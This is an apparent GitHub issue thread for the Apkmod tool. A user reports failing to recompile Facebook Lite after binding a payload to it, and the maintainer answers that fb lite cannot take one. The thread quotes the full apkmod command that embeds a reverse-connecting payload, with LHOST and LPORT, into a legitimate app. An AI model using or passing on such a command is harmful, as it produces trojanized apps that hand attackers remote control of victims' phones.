### ISSUE TITLE
Error in binding apks

### ISSUE THREAD

**Issue by jmaxojan** [Hax4us/Apkmod#67]
![Screenshot_20200623-175136](https://user-images.githubusercontent.com/54234129/85419291-92197180-b57a-11ea-827d-1a14831e98bd.jpg)

I tried to bind FaceBook Lite app and I faced this error, I don't know if I can't bind facebook or the error in my installation? , because it says that it can't recompile it, I tried to to that manually from the temp folder but it keep showing me errors, please help!!

The command :
`apkmod -b /sdcard/lite.apk -o /sdcard/liteB.apk LHOST=10.0.0.17 LPORT=4444`

**Comment by Hax4us** [comment]
Yes you can't bind payload with fb lite.
